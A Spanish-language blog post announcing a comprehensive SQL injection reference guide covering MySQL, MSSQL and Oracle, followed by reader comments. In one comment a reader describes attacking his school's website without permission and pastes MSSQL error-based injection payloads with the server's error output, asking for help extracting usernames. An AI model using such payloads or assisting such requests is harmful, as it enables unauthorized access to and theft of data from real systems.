Referencia para Inyección SQL

Roberto Salgado (@LightOS) publicó recientemente una guía muy completa para inyecciones SQL. Cubre MySQL, MSSQL y ORACLE. Desde la detección de inyecciones SQL hasta explotación avanzada evadiendo WAF/IDS. Incluye algunos extras como la guía de prevención de inyecciones SQL de la OWASP, una serie de retos de inyección SQL (algunos de los cuales nunca han sido resueltos), y ligas a otras referencias.

Se agregan nuevos ataques y metodos de evasión diariamente.

Su contenido es el siguiente:

Share
Esta entrada fue publicada en Investigaciones. Guarda el enlace permanente.

4 respuestas a Referencia para Inyección SQL

  1. wilmer dijo:

    esta en pdf????

  2. Carlos dijo:

    Excelente blog, sigue asì!

  3. hackdracko dijo:

    Hola es muy buena la guia, estoy intentando sql en la pagina de mi escuela y efectivamente ya tengo el USER,SERVE,BD de la pagina, asi como todas las tablas de la base de Datos que me interesa tengo un problema con una consulta.

    ‘+and+1=convert(char,(select+top+1+id+from+tabla+where+id+NOT+in+(‘username_1’)+order+by+id+desc)) –‘

    Conversion failed when converting the varchar value ‘username_1’ to data type int.

    Entonces lo cambio a la siguiente forma:

    ‘+and+1=convert(char,(select+top+1+id+from+tabla+where+id+NOT+in+(”)+order+by+id+desc)) –‘

    Y me arroja el siguiente error.
    ADODB.Field error ‘80020009’

    Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

    /detalles.asp, line 0

    Como puedo solucionarlo, en realidad ya se que el campo id = a int, el campo que me interesa es el username pero este me parece que solo acepta valores en numeros.

    Gracias y SALUDOS.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *